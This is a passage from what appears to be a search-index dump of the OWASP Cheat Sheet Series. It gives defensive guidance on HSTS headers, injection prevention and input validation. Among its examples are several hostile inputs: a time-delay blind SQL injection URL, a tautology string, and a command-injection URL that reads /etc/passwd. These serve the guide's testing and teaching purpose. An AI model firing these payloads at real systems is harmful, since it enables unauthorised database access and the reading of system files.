"},{"location":"cheatsheets/HTTP_Headers_Cheat_Sheet.html#references","title":"References","text":""},{"location":"cheatsheets/HTTP_Strict_Transport_Security_Cheat_Sheet.html","title":"HTTP Strict Transport Security Cheat Sheet","text":""},{"location":"cheatsheets/HTTP_Strict_Transport_Security_Cheat_Sheet.html#introduction","title":"Introduction","text":"

HTTP Strict Transport Security (also named HSTS) is an opt-in security enhancement that is specified by a web application through the use of a special response header. Once a supported browser receives this header that browser will prevent any communications from being sent over HTTP to the specified domain and will instead send all communications over HTTPS. It also prevents HTTPS click through prompts on browsers.

The specification has been released and published end of 2012 as RFC 6797 (HTTP Strict Transport Security (HSTS)) by the IETF.

"},{"location":"cheatsheets/HTTP_Strict_Transport_Security_Cheat_Sheet.html#threats","title":"Threats","text":"

HSTS addresses the following threats:

"},{"location":"cheatsheets/HTTP_Strict_Transport_Security_Cheat_Sheet.html#examples","title":"Examples","text":"

Simple example, using a long (1 year = 31536000 seconds) max-age. This example is dangerous since it lacks includeSubDomains:

Strict-Transport-Security:\u00a0max-age=31536000

This example is useful if all present and future subdomains will be HTTPS. This is a more secure option but will block access to certain pages that can only be served over HTTP:

Strict-Transport-Security:\u00a0max-age=31536000;\u00a0includeSubDomains

This example is useful if all present and future subdomains will be HTTPS. In this example we set a very short max-age in case of mistakes during initial rollout:

Strict-Transport-Security:\u00a0max-age=86400;\u00a0includeSubDomains

Recommended:

Strict-Transport-Security:\u00a0max-age=31536000;\u00a0includeSubDomains;\u00a0preload

The preload flag indicates the site owner's consent to have their domain preloaded. The site owner still needs to then go and submit the domain to the list.

"},{"location":"cheatsheets/HTTP_Strict_Transport_Security_Cheat_Sheet.html#problems","title":"Problems","text":"

Site owners can use HSTS to identify users without cookies. This can lead to a significant privacy leak. Take a look here for more details.

Cookies can be manipulated from sub-domains, so omitting the includeSubDomains option permits a broad range of cookie-related attacks that HSTS would otherwise prevent by requiring a valid certificate for a subdomain. Ensuring the secure flag is set on all cookies will also prevent, some, but not all, of the same attacks.

"},{"location":"cheatsheets/HTTP_Strict_Transport_Security_Cheat_Sheet.html#browser-support","title":"Browser Support","text":"

As of September 2019 HSTS is supported by all modern browsers, with the only notable exception being Opera Mini.

"},{"location":"cheatsheets/HTTP_Strict_Transport_Security_Cheat_Sheet.html#references","title":"References","text":""},{"location":"cheatsheets/Infrastructure_as_Code_Security_Cheat_Sheet.html","title":"Infrastructure as Code Security","text":""},{"location":"cheatsheets/Infrastructure_as_Code_Security_Cheat_Sheet.html#infrastructure-as-code-security-cheatsheet","title":"Infrastructure as Code Security Cheatsheet","text":""},{"location":"cheatsheets/Infrastructure_as_Code_Security_Cheat_Sheet.html#introduction","title":"Introduction","text":"

Infrastructure as code (IaC), also known as software-defined infrastructure, allows the configuration and deployment of infrastructure components faster with consistency by allowing them to be defined as a code and also enables repeatable deployments across environments.

"},{"location":"cheatsheets/Infrastructure_as_Code_Security_Cheat_Sheet.html#security-best-practices","title":"Security best practices","text":"

Here are some of the security best practices for IaC that can be easily integrated into the Software Development Lifecycle:

"},{"location":"cheatsheets/Infrastructure_as_Code_Security_Cheat_Sheet.html#develop-and-distribute","title":"Develop and Distribute","text":""},{"location":"cheatsheets/Infrastructure_as_Code_Security_Cheat_Sheet.html#deploy","title":"Deploy","text":""},{"location":"cheatsheets/Infrastructure_as_Code_Security_Cheat_Sheet.html#runtime","title":"Runtime","text":""},{"location":"cheatsheets/Infrastructure_as_Code_Security_Cheat_Sheet.html#references","title":"References","text":""},{"location":"cheatsheets/Injection_Prevention_Cheat_Sheet.html","title":"Injection Prevention Cheat Sheet","text":""},{"location":"cheatsheets/Injection_Prevention_Cheat_Sheet.html#introduction","title":"Introduction","text":"

This article is focused on providing clear, simple, actionable guidance for preventing the entire category of Injection flaws in your applications. Injection attacks, especially SQL Injection, are unfortunately very common.

Application accessibility is a very important factor in protection and prevention of injection flaws. Only the minority of all applications within a company/enterprise are developed in house, where as most applications are from external sources. Open source applications give at least the opportunity to fix problems, but closed source applications need a different approach to injection flaws.

Injection flaws occur when an application sends untrusted data to an interpreter. Injection flaws are very prevalent, particularly in legacy code, often found in SQL queries, LDAP queries, XPath queries, OS commands, program arguments, etc. Injection flaws are easy to discover when examining code, but more difficult via testing. Scanners and fuzzers can help attackers find them.

Depending on the accessibility different actions must be taken in order to fix them. It is always the best way to fix the problem in source code itself, or even redesign some parts of the applications. But if the source code is not available or it is simply uneconomical to fix legacy software only virtual patching makes sense.

"},{"location":"cheatsheets/Injection_Prevention_Cheat_Sheet.html#application-types","title":"Application Types","text":"

Three classes of applications can usually be seen within a company. Those 3 types are needed to identify the actions which need to take place in order to prevent/fix injection flaws.

"},{"location":"cheatsheets/Injection_Prevention_Cheat_Sheet.html#a1-new-application","title":"A1: New Application","text":"

A new web application in the design phase, or in early stage development.

"},{"location":"cheatsheets/Injection_Prevention_Cheat_Sheet.html#a2-productive-open-source-application","title":"A2: Productive Open Source Application","text":"

An already productive application, which can be easily adapted. A Model-View-Controller (MVC) type application is just one example of having a easily accessible application architecture.

"},{"location":"cheatsheets/Injection_Prevention_Cheat_Sheet.html#a3-productive-closed-source-application","title":"A3: Productive Closed Source Application","text":"

A productive application which cannot or only with difficulty be modified.

"},{"location":"cheatsheets/Injection_Prevention_Cheat_Sheet.html#forms-of-injection","title":"Forms of Injection","text":"

There are several forms of injection targeting different technologies including SQL queries, LDAP queries, XPath queries and OS commands.

"},{"location":"cheatsheets/Injection_Prevention_Cheat_Sheet.html#query-languages","title":"Query languages","text":"

The most famous form of injection is SQL Injection where an attacker can modify existing database queries. For more information see the SQL Injection Prevention Cheat Sheet.

But also LDAP, SOAP, XPath and REST based queries can be susceptible to injection attacks allowing for data retrieval or control bypass.

"},{"location":"cheatsheets/Injection_Prevention_Cheat_Sheet.html#sql-injection","title":"SQL Injection","text":"

An SQL injection attack consists of insertion or \"injection\" of either a partial or complete SQL query via the data input or transmitted from the client (browser) to the web application.

A successful SQL injection attack can read sensitive data from the database, modify database data (insert/update/delete), execute administration operations on the database (such as shutdown the DBMS), recover the content of a given file existing on the DBMS file system or write files into the file system, and, in some cases, issue commands to the operating system. SQL injection attacks are a type of injection attack, in which SQL commands are injected into data-plane input in order to affect the execution of predefined SQL commands.

SQL Injection attacks can be divided into the following three classes:

"},{"location":"cheatsheets/Injection_Prevention_Cheat_Sheet.html#how-to-test-for-the-issue","title":"How to test for the issue","text":""},{"location":"cheatsheets/Injection_Prevention_Cheat_Sheet.html#during-code-review","title":"During code review","text":"

please check for any queries to the database are not done via prepared statements.

If dynamic statements are being made please check if the data is sanitized before used as par of the statement.

Auditors should always look for uses of sp_execute, execute or exec within SQL Server stored procedures. Similar audit guidelines are necessary for similar functions for other vendors.

"},{"location":"cheatsheets/Injection_Prevention_Cheat_Sheet.html#automated-exploitation","title":"Automated Exploitation","text":"

Most of the situation and techniques below here can be performed in a automated way using some tools. In this article the tester can find information how to perform an automated auditing using SQLMap

Equally Static Code Analysis Data flow rules can detect of unsanitized user controlled input can change the SQL query.

"},{"location":"cheatsheets/Injection_Prevention_Cheat_Sheet.html#stored-procedure-injection","title":"Stored Procedure Injection","text":"

When using dynamic SQL within a stored procedure, the application must properly sanitize the user input to eliminate the risk of code injection. If not sanitized, the user could enter malicious SQL that will be executed within the stored procedure.

"},{"location":"cheatsheets/Injection_Prevention_Cheat_Sheet.html#time-delay-exploitation-technique","title":"Time delay Exploitation technique","text":"

The time delay exploitation technique is very useful when the tester find a Blind SQL Injection situation, in which nothing is known on the outcome of an operation. This technique consists in sending an injected query and in case the conditional is true, the tester can monitor the time taken to for the server to respond. If there is a delay, the tester can assume the result of the conditional query is true. This exploitation technique can be different from DBMS to DBMS (check DBMS specific section).

http://www.example.com/product.php?id=10 AND IF(version() like '5%', sleep(10), 'false'))--\n

In this example the tester is checking whether the MySql version is 5.x or not, making the server delay the answer by 10 seconds. The tester can increase the delay time and monitor the responses. The tester also doesn't need to wait for the response. Sometimes they can set a very high value (e.g. 100) and cancel the request after some seconds.

"},{"location":"cheatsheets/Injection_Prevention_Cheat_Sheet.html#out-of-band-exploitation-technique","title":"Out of band Exploitation technique","text":"

This technique is very useful when the tester find a Blind SQL Injection situation, in which nothing is known on the outcome of an operation. The technique consists of the use of DBMS functions to perform an out of band connection and deliver the results of the injected query as part of the request to the tester's server. Like the error based techniques, each DBMS has its own functions. Check for specific DBMS section.

"},{"location":"cheatsheets/Injection_Prevention_Cheat_Sheet.html#remediation","title":"Remediation","text":""},{"location":"cheatsheets/Injection_Prevention_Cheat_Sheet.html#defense-option-1-prepared-statements-with-parameterized-queries","title":"Defense Option 1: Prepared Statements (with Parameterized Queries)","text":"

Prepared statements ensure that an attacker is not able to change the intent of a query, even if SQL commands are inserted by an attacker. In the safe example below, if an attacker were to enter the userID of tom' or '1'='1, the parameterized query would not be vulnerable and would instead look for a username which literally matched the entire string tom' or '1'='1.

"},{"location":"cheatsheets/Injection_Prevention_Cheat_Sheet.html#defense-option-2-stored-procedures","title":"Defense Option 2: Stored Procedures","text":"

The difference between prepared statements and stored procedures is that the SQL code for a stored procedure is defined and stored in the database itself, and then called from the application.

Both of these techniques have the same effectiveness in preventing SQL injection so your organization should choose which approach makes the most sense for you. Stored procedures are not always safe from SQL injection. However, certain standard stored procedure programming constructs have the same effect as the use of parameterized queries when implemented safely* which is the norm for most stored procedure languages.

Note: 'Implemented safely' means the stored procedure does not include any unsafe dynamic SQL generation.

"},{"location":"cheatsheets/Injection_Prevention_Cheat_Sheet.html#defense-option-3-allow-list-input-validation","title":"Defense Option 3: Allow-List Input Validation","text":"

Various parts of SQL queries aren't legal locations for the use of bind variables, such as the names of tables or columns, and the sort order indicator (ASC or DESC). In such situations, input validation or query redesign is the most appropriate defense. For the names of tables or columns, ideally those values come from the code, and not from user parameters.

But if user parameter values are used to make different for table names and column names, then the parameter values should be mapped to the legal/expected table or column names to make sure unvalidated user input doesn't end up in the query. Please note, this is a symptom of poor design and a full rewrite should be considered if time allows.

"},{"location":"cheatsheets/Injection_Prevention_Cheat_Sheet.html#defense-option-4-escaping-all-user-supplied-input","title":"Defense Option 4: Escaping All User-Supplied Input","text":"

This technique should only be used as a last resort, when none of the above are feasible. Input validation is probably a better choice as this methodology is frail compared to other defenses and we cannot guarantee it will prevent all SQL Injection in all situations.

This technique is to escape user input before putting it in a query. It's usually only recommended to retrofit legacy code when implementing input validation isn't cost effective.

"},{"location":"cheatsheets/Injection_Prevention_Cheat_Sheet.html#example-code-java","title":"Example code - Java","text":""},{"location":"cheatsheets/Injection_Prevention_Cheat_Sheet.html#safe-java-prepared-statement-example","title":"Safe Java Prepared Statement Example","text":"

The following code example uses a PreparedStatement, Java's implementation of a parameterized query, to execute the same database query.

// This should REALLY be validated too\nString custname = request.getParameter(\"customerName\");\n// Perform input validation to detect attacks\nString query = \"SELECT account_balance FROM user_data WHERE user_name = ?\";\nPreparedStatement pstmt = connection.prepareStatement(query);\npstmt.setString(1, custname);\nResultSet results = pstmt.executeQuery();\n

We have shown examples in Java, but practically all other languages, including Cold Fusion, and Classic ASP, support parameterized query interfaces.

"},{"location":"cheatsheets/Injection_Prevention_Cheat_Sheet.html#safe-java-stored-procedure-example","title":"Safe Java Stored Procedure Example","text":"

The following code example uses a CallableStatement, Java's implementation of the stored procedure interface, to execute the same database query. The sp_getAccountBalance stored procedure would have to be predefined in the database and implement the same functionality as the query defined above.

// This should REALLY be validated\nString custname = request.getParameter(\"customerName\");\ntry {\nCallableStatement cs = connection.prepareCall(\"{call sp_getAccountBalance(?)}\");\ncs.setString(1, custname);\nResultSet results = cs.executeQuery();\n// Result set handling...\n} catch (SQLException se) {\n// Logging and error handling...\n}\n
"},{"location":"cheatsheets/Injection_Prevention_Cheat_Sheet.html#ldap-injection","title":"LDAP Injection","text":"

LDAP Injection is an attack used to exploit web based applications that construct LDAP statements based on user input. When an application fails to properly sanitize user input, it's possible to modify LDAP statements through techniques similar to\u00a0SQL Injection. LDAP injection attacks could result in the granting of permissions to unauthorized queries, and content modification inside the LDAP tree. For more information on LDAP Injection attacks, visit\u00a0LDAP injection.

LDAP injection\u00a0attacks are common due to two factors:

  1. The lack of safer, parameterized LDAP query interfaces
  2. The widespread use of LDAP to authenticate users to systems.
"},{"location":"cheatsheets/Injection_Prevention_Cheat_Sheet.html#how-to-test-for-the-issue_1","title":"How to test for the issue","text":""},{"location":"cheatsheets/Injection_Prevention_Cheat_Sheet.html#during-code-review_1","title":"During code review","text":"

Please check for any queries to the LDAP escape special characters, see here.

"},{"location":"cheatsheets/Injection_Prevention_Cheat_Sheet.html#automated-exploitation_1","title":"Automated Exploitation","text":"

Scanner module of tool like OWASP ZAP have module to detect LDAP injection issue.

"},{"location":"cheatsheets/Injection_Prevention_Cheat_Sheet.html#remediation_1","title":"Remediation","text":""},{"location":"cheatsheets/Injection_Prevention_Cheat_Sheet.html#escape-all-variables-using-the-right-ldap-encoding-function","title":"Escape all variables using the right LDAP encoding function","text":"

The main way LDAP stores names is based on DN (distinguished name). You can think of this like a unique identifier. These are sometimes used to access resources, like a username.

A DN might look like this

cn=Richard Feynman, ou=Physics Department, dc=Caltech, dc=edu\n

or

uid=inewton, ou=Mathematics Department, dc=Cambridge, dc=com\n

There are certain characters that are considered special characters in a DN. The exhaustive list is the following: \\ # + < > , ; \" = and leading or trailing spaces

Each DN points to exactly 1 entry, which can be thought of sort of like a row in a RDBMS. For each entry, there will be 1 or more attributes which are analogous to RDBMS columns. If you are interested in searching through LDAP for users will certain attributes, you may do so with search filters. In a search filter, you can use standard boolean logic to get a list of users matching an arbitrary constraint. Search filters are written in Polish notation AKA prefix notation.

Example:

(&(ou=Physics)(| (manager=cn=Freeman Dyson,ou=Physics,dc=Caltech,dc=edu)\n(manager=cn=Albert Einstein,ou=Physics,dc=Princeton,dc=edu) ))\n

When building LDAP queries in application code, you MUST escape any untrusted data that is added to any LDAP query. There are two forms of LDAP escaping. Encoding for LDAP Search and Encoding for LDAP DN (distinguished name). The proper escaping depends on whether you are sanitizing input for a search filter, or you are using a DN as a username-like credential for accessing some resource.

"},{"location":"cheatsheets/Injection_Prevention_Cheat_Sheet.html#example-code-java_1","title":"Example code - Java","text":""},{"location":"cheatsheets/Injection_Prevention_Cheat_Sheet.html#safe-java-for-ldap-escaping-example","title":"Safe Java for LDAP escaping Example","text":"
public String escapeDN (String name) {\n//From RFC 2253 and the / character for JNDI\nfinal char[] META_CHARS = {'+', '\"', '<', '>', ';', '/'};\nString escapedStr = new String(name);\n//Backslash is both a Java and an LDAP escape character,\n//so escape it first\nescapedStr = escapedStr.replaceAll(\"\\\\\\\\\\\\\\\\\",\"\\\\\\\\\\\\\\\\\");\n//Positional characters - see RFC 2253\nescapedStr = escapedStr.replaceAll(\"\\^#\",\"\\\\\\\\\\\\\\\\#\");\nescapedStr = escapedStr.replaceAll(\"\\^ | $\",\"\\\\\\\\\\\\\\\\ \");\nfor (int i=0 ; i < META_CHARS.length ; i++) {\nescapedStr = escapedStr.replaceAll(\"\\\\\\\\\" +\nMETA_CHARS[i],\"\\\\\\\\\\\\\\\\\" + META_CHARS[i]);\n}\nreturn escapedStr;\n}\n

Note, that the backslash character is a Java String literal and a regular expression escape character.

public String escapeSearchFilter (String filter) {\n//From RFC 2254\nString escapedStr = new String(filter);\nescapedStr = escapedStr.replaceAll(\"\\\\\\\\\\\\\\\\\",\"\\\\\\\\\\\\\\\\5c\");\nescapedStr = escapedStr.replaceAll(\"\\\\\\\\\\*\",\"\\\\\\\\\\\\\\\\2a\");\nescapedStr = escapedStr.replaceAll(\"\\\\\\\\(\",\"\\\\\\\\\\\\\\\\28\");\nescapedStr = escapedStr.replaceAll(\"\\\\\\\\)\",\"\\\\\\\\\\\\\\\\29\");\nescapedStr = escapedStr.replaceAll(\"\\\\\\\\\" +\nCharacter.toString('\\\\u0000'), \"\\\\\\\\\\\\\\\\00\");\nreturn escapedStr;\n}\n
"},{"location":"cheatsheets/Injection_Prevention_Cheat_Sheet.html#xpath-injection","title":"XPath Injection","text":"

TODO

"},{"location":"cheatsheets/Injection_Prevention_Cheat_Sheet.html#scripting-languages","title":"Scripting languages","text":"

All scripting languages used in web applications have a form of an eval call which receives code at runtime and executes it. If code is crafted using unvalidated and unescaped user input code injection can occur which allows an attacker to subvert application logic and eventually to gain local access.

Every time a scripting language is used, the actual implementation of the 'higher' scripting language is done using a 'lower' language like C. If the scripting language has a flaw in the data handling code 'Null Byte Injection' attack vectors can be deployed to gain access to other areas in memory, which results in a successful attack.

"},{"location":"cheatsheets/Injection_Prevention_Cheat_Sheet.html#operating-system-commands","title":"Operating System Commands","text":"

OS command injection is a technique used via a web interface in order to execute OS commands on a web server. The user supplies operating system commands through a web interface in order to execute OS commands.

Any web interface that is not properly sanitized is subject to this exploit. With the ability to execute OS commands, the user can upload malicious programs or even obtain passwords. OS command injection is preventable when security is emphasized during the design and development of applications.

"},{"location":"cheatsheets/Injection_Prevention_Cheat_Sheet.html#how-to-test-for-the-issue_2","title":"How to test for the issue","text":""},{"location":"cheatsheets/Injection_Prevention_Cheat_Sheet.html#during-code-review_2","title":"During code review","text":"

Check if any command execute methods are called and in unvalidated user input are taken as data for that command.

Out side of that, appending a semicolon to the end of a URL query parameter followed by an operating system command, will execute the command. %3B is URL encoded and decodes to semicolon. This is because the ; is interpreted as a command separator.

Example: http://sensitive/something.php?dir=%3Bcat%20/etc/passwd

If the application responds with the output of the /etc/passwd file then you know the attack has been successful. Many web application scanners can be used to test for this attack as they inject variations of command injections and test the response.

Equally Static Code Analysis tools check the data flow of untrusted user input into a web application and check if the data is then entered into a dangerous method which executes the user input as a command.

"},{"location":"cheatsheets/Injection_Prevention_Cheat_Sheet.html#remediation_2","title":"Remediation","text":"

If it is considered unavoidable the call to a system command incorporated with user-supplied, the following two layers of defense should be used within software in order to prevent attacks

  1. Parameterization\u00a0- If available, use structured mechanisms that automatically enforce the separation between data and command. These mechanisms can help to provide the relevant quoting, encoding.
  2. Input validation\u00a0- the values for commands and the relevant arguments should be both validated. There are different degrees of validation for the actual command and its arguments:

^[a-z0-9]{3,10}$

"},{"location":"cheatsheets/Injection_Prevention_Cheat_Sheet.html#example-code-java_2","title":"Example code - Java","text":""},{"location":"cheatsheets/Injection_Prevention_Cheat_Sheet.html#incorrect-usage","title":"Incorrect Usage","text":"
ProcessBuilder b = new ProcessBuilder(\"C:\\DoStuff.exe -arg1 -arg2\");\n

In this example, the command together with the arguments are passed as a one string, making easy to manipulate that expression and inject malicious strings.

"},{"location":"cheatsheets/Injection_Prevention_Cheat_Sheet.html#correct-usage","title":"Correct Usage","text":"

Here is an example that starts a process with a modified working directory. The command and each of the arguments are passed separately. This make it easy to validated each term and reduces the risk to insert malicious strings.

ProcessBuilder pb = new ProcessBuilder(\"TrustedCmd\", \"TrustedArg1\", \"TrustedArg2\");\nMap<String, String> env = pb.environment();\npb.directory(new File(\"TrustedDir\"));\nProcess p = pb.start();\n
"},{"location":"cheatsheets/Injection_Prevention_Cheat_Sheet.html#network-protocols","title":"Network Protocols","text":"

Web applications often communicate with network daemons (like SMTP, IMAP, FTP) where user input becomes part of the communication stream. Here it is possible to inject command sequences to abuse an established session.

"},{"location":"cheatsheets/Injection_Prevention_Cheat_Sheet.html#injection-prevention-rules","title":"Injection Prevention Rules","text":""},{"location":"cheatsheets/Injection_Prevention_Cheat_Sheet.html#rule-1-perform-proper-input-validation","title":"Rule #1 (Perform proper input validation)","text":"

Perform proper input validation. Positive or \"allow list\" input validation with appropriate canonicalization is also recommended, but is not a complete defense as many applications require special characters in their input.

"},{"location":"cheatsheets/Injection_Prevention_Cheat_Sheet.html#rule-2-use-a-safe-api","title":"Rule #2 (Use a safe API)","text":"

The preferred option is to use a safe API which avoids the use of the interpreter entirely or provides a parameterized interface. Be careful of APIs, such as stored procedures, that are parameterized, but can still introduce injection under the hood.

"},{"location":"cheatsheets/Injection_Prevention_Cheat_Sheet.html#rule-3-contextually-escape-user-data","title":"Rule #3 (Contextually escape user data)","text":"

If a parameterized API is not available, you should carefully escape special characters using the specific escape syntax for that interpreter.

"},{"location":"cheatsheets/Injection_Prevention_Cheat_Sheet.html#other-injection-cheatsheets","title":"Other Injection Cheatsheets","text":"

SQL Injection Prevention Cheat Sheet

OS Command Injection Defense Cheat Sheet

LDAP Injection Prevention Cheat Sheet

Injection Prevention Cheat Sheet in Java

"},{"location":"cheatsheets/Injection_Prevention_in_Java_Cheat_Sheet.html","title":"Injection Prevention Cheat Sheet in Java","text":"

This information has been moved to the dedicated Java Security CheatSheet

"},{"location":"cheatsheets/Input_Validation_Cheat_Sheet.html","title":"Input Validation Cheat Sheet","text":""},{"location":"cheatsheets/Input_Validation_Cheat_Sheet.html#introduction","title":"Introduction","text":"

This article is focused on providing clear, simple, actionable guidance for providing Input Validation security functionality in your applications.

"},{"location":"cheatsheets/Input_Validation_Cheat_Sheet.html#goals-of-input-validation","title":"Goals of Input Validation","text":"

Input validation is performed to ensure only properly formed data is entering the workflow in an information system, preventing malformed data from persisting in the database and triggering malfunction of various downstream components. Input validation should happen as early as possible in the data flow, preferably as soon as the data is received from the external party.

Data from all potentially untrusted sources should be subject to input validation, including not only Internet-facing web clients but also backend feeds over extranets, from suppliers, partners, vendors or regulators, each of which may be compromised on their own and start sending malformed data.

Input Validation should not be used as the primary method of preventing XSS, SQL Injection and other attacks which are covered in respective cheat sheets but can significantly contribute to reducing their impact if implemented properly.

"},{"location":"cheatsheets/Input_Validation_Cheat_Sheet.html#input-validation-strategies","title":"Input validation strategies","text":"

Input validation should be applied on both syntactical and Semantic level.

Syntactic validation should enforce correct syntax of structured fields (e.g. SSN, date, currency symbol).

Semantic validation should enforce correctness of their values in the specific business context (e.g. start date is before end date, price is within expected range).

It is always recommended to prevent attacks as early as possible in the processing of the user's (attacker's) request. Input validation can be used to detect unauthorized input before it is processed by the application.

"},{"location":"cheatsheets/Input_Validation_Cheat_Sheet.html#implementing-input-validation","title":"Implementing input validation","text":"

Input validation can be implemented using any programming technique that allows effective enforcement of syntactic and semantic correctness, for example:

"},{"location":"cheatsheets/Input_Validation_Cheat_Sheet.html#allow-list-vs-block-list","title":"Allow list vs block list","text":"

It is a common mistake to use block list validation in order to try to detect possibly dangerous characters and patterns like the apostrophe ' character, the string 1=1, or the <script> tag, but this is a massively flawed approach as it is trivial for an attacker to bypass such filters.

Plus, such filters frequently prevent authorized input, like O'Brian, where the ' character is fully legitimate. For more information on XSS filter evasion please see this wiki page.

Allow list validation is appropriate for all input fields provided by the user. Allow list validation involves defining exactly what IS authorized, and by definition, everything else is not authorized.

If it's well structured data, like dates, social security numbers, zip codes, email addresses, etc. then the developer should be able to define a very strong validation pattern, usually based on regular expressions, for validating such input.

If the input field comes from a fixed set of options, like a drop down list or radio buttons, then the input needs to match exactly one of the values offered to the user in the first place.

"},{"location":"cheatsheets/Input_Validation_Cheat_Sheet.html#validating-free-form-unicode-text","title":"Validating free-form Unicode text","text":"

Free-form text, especially with Unicode characters, is perceived as difficult to validate due to a relatively large space of characters that need to be allowed.

It's also free-form text input that highlights the importance of proper context-aware output encoding and quite clearly demonstrates that input validation is not the primary safeguards against Cross-Site Scripting. If your users want to type apostrophe ' or less-than sign < in their comment field, they might have perfectly legitimate reason for that and the application's job is to properly handle it throughout the whole life cycle of the data.

The primary means of input validation for free-form text input should be:

References:

"},{"location":"cheatsheets/Input_Validation_Cheat_Sheet.html#regular-expressions","title":"Regular expressions","text":"

Developing regular expressions can be complicated, and is well beyond the scope of this cheat sheet.

There are lots of resources on the internet about how to write regular expressions, including this site and the OWASP Validation Regex Repository.

When designing regular expression, be aware of RegEx Denial of Service (ReDoS) attacks. These attacks cause a program using a poorly designed Regular Expression to operate very slowly and utilize CPU resources for a very long time.

In summary, input validation should:

"},{"location":"cheatsheets/Input_Validation_Cheat_Sheet.html#allow-list-regular-expression-examples","title":"Allow List Regular Expression Examples","text":"

Validating a U.S. Zip Code (5 digits plus optional -4)

^\\d{5}(-\\d{4})?$\n

Validating U.S. State Selection From a Drop-Down Menu

^(AA|AE|AP|AL|AK|AS|AZ|AR|CA|CO|CT|DE|DC|FM|FL|GA|GU|\nHI|ID|IL|IN|IA|KS|KY|LA|ME|MH|MD|MA|MI|MN|MS|MO|MT|NE|\nNV|NH|NJ|NM|NY|NC|ND|MP|OH|OK|OR|PW|PA|PR|RI|SC|SD|TN|\nTX|UT|VT|VI|VA|WA|WV|WI|WY)$\n

Java Regex Usage Example:

Example\u00a0validating\u00a0the\u00a0parameter\u00a0\"zip\"\u00a0using\u00a0a\u00a0regular\u00a0expression.

private\u00a0static\u00a0final\u00a0Pattern\u00a0zipPattern\u00a0=\u00a0Pattern.compile(\"^\\d{5}(-\\d{4})?$\");\n\npublic\u00a0void\u00a0doPost(\u00a0HttpServletRequest\u00a0request,\u00a0HttpServletResponse\u00a0response)\u00a0{\ntry\u00a0{\nString\u00a0zipCode\u00a0=\u00a0request.getParameter(\u00a0\"zip\"\u00a0);\nif\u00a0(\u00a0!zipPattern.matcher(\u00a0zipCode\u00a0).matches()\u00a0\u00a0{\nthrow\u00a0new\u00a0YourValidationException(\u00a0\"Improper\u00a0zipcode\u00a0format.\"\u00a0);\n}\n//\u00a0do\u00a0what\u00a0you\u00a0want\u00a0here,\u00a0after\u00a0its\u00a0been\u00a0validated\u00a0..\n}\u00a0catch(YourValidationException\u00a0e\u00a0)\u00a0{\nresponse.sendError(\u00a0response.SC_BAD_REQUEST,\u00a0e.getMessage()\u00a0);\n}\n}\n

Some Allow list validators have also been predefined in various open source packages that you can leverage. For example:

"},{"location":"cheatsheets/Input_Validation_Cheat_Sheet.html#client-side-vs-server-side-validation","title":"Client Side vs Server Side Validation","text":"

Be aware that any JavaScript input validation performed on the client can be bypassed by an attacker that disables JavaScript or uses a Web Proxy. Ensure that any input validation performed on the client is also performed on the server.

"},{"location":"cheatsheets/Input_Validation_Cheat_Sheet.html#validating-rich-user-content","title":"Validating Rich User Content","text":"

It is very difficult to validate rich content submitted by a user. For more information, please see the XSS cheatsheet on Sanitizing HTML Markup with a Library Designed for the Job.

"},{"location":"cheatsheets/Input_Validation_Cheat_Sheet.html#preventing-xss-and-content-security-policy","title":"Preventing XSS and Content Security Policy","text":"

All user data controlled must be encoded when returned in the HTML page to prevent the execution of malicious data (e.g. XSS). For example <script> would be returned as &lt;script&gt;

The type of encoding is specific to the context of the page where the user controlled data is inserted. For example, HTML entity encoding is appropriate for data placed into the HTML body. However, user data placed into a script would need JavaScript specific output encoding.

Detailed information on XSS prevention here: OWASP XSS Prevention Cheat Sheet

"},{"location":"cheatsheets/Input_Validation_Cheat_Sheet.html#file-upload-validation","title":"File Upload Validation","text":"

Many websites allow users to upload files, such as a profile picture or more. This section helps provide that feature securely.

Check the File Upload Cheat Sheet.

"},{"location":"cheatsheets/Input_Validation_Cheat_Sheet.html#upload-verification","title":"Upload Verification","text":""},{"location":"cheatsheets/Input_Validation_Cheat_Sheet.html#upload-storage","title":"Upload Storage","text":""},{"location":"cheatsheets/Input_Validation_Cheat_Sheet.html#public-serving-of-uploaded-content","title":"Public Serving of Uploaded Content","text":""},{"location":"cheatsheets/Input_Validation_Cheat_Sheet.html#beware-of-special-files","title":"Beware of \"special\" files","text":"

The upload feature should be using an allow-list approach to only allow specific file types and extensions. However, it is important to be aware of the following file types that, if allowed, could result in security vulnerabilities:

"},{"location":"cheatsheets/Input_Validation_Cheat_Sheet.html#image-upload-verification","title":"Image Upload Verification","text":""},{"location":"cheatsheets/Input_Validation_Cheat_Sheet.html#email-address-validation","title":"Email Address Validation","text":""},{"location":"cheatsheets/Input_Validation_Cheat_Sheet.html#syntactic-validation","title":"Syntactic Validation","text":"

The format of email addresses is defined by RFC 5321, and is far more complicated than most people realise. As an example, the following are all considered to be valid email addresses:

Properly parsing email addresses for validity with regular expressions is very complicated, although there are a number of publicly available documents on regex.

The biggest caveat on this is that although the RFC defines a very flexible format for email addresses, most real world implementations (such as mail servers) use a far more restricted address format, meaning that they will reject addresses that are technically valid. Although they may be technically correct, these addresses are of little use if your application will not be able to actually send emails to them.

As such, the best way to validate email addresses is to perform some basic initial validation, and then pass the address to the mail server and catch the exception if it rejects it. This means that the application can be confident that its mail server can send emails to any addresses it accepts. The initial validation could be as simple as:

"},{"location":"cheatsheets/Input_Validation_Cheat_Sheet.html#semantic-validation","title":"Semantic Validation","text":"

Semantic validation is about determining whether the email address is correct and legitimate. The most common way to do this is to send an email to the user, and require that they click a link in the email, or enter a code that has been sent to them. This provides a basic level of assurance that:

The links that are sent to users to prove ownership should contain a token that is:

After validating the ownership of the email address, the user should then be required to authenticate on the application through the usual mechanism.

"},{"location":"cheatsheets/Input_Validation_Cheat_Sheet.html#disposable-email-addresses","title":"Disposable Email Addresses","text":"

In some cases, users may not want to give their real email address when registering on the application, and will instead provide a disposable email address. These are publicly available addresses that do not require the user to authenticate, and are typically used to reduce the amount of spam received by users' primary email addresses.

Blocking disposable email addresses is almost impossible, as there are a large number of websites offering these services, with new domains being created every day. There are a number of publicly available lists and commercial lists of known disposable domains, but these will always be incomplete.

If these lists are used to block the use of disposable email addresses then the user should be presented with a message explaining why they are blocked (although they are likely to simply search for another disposable provider rather than giving their legitimate address).

If it is essential that disposable email addresses are blocked, then registrations should only be allowed from specifically-allowed email providers. However, if this includes public providers such as Google or Yahoo, users can simply register their own disposable address with them.

"},{"location":"cheatsheets/Input_Validation_Cheat_Sheet.html#sub-addressing","title":"Sub-Addressing","text":"

Sub-addressing allows a user to specify a tag in the local part of the email address (before the @ sign), which will be ignored by the mail server. For example, if that example.org domain supports sub-addressing, then the following email addresses are equivalent:

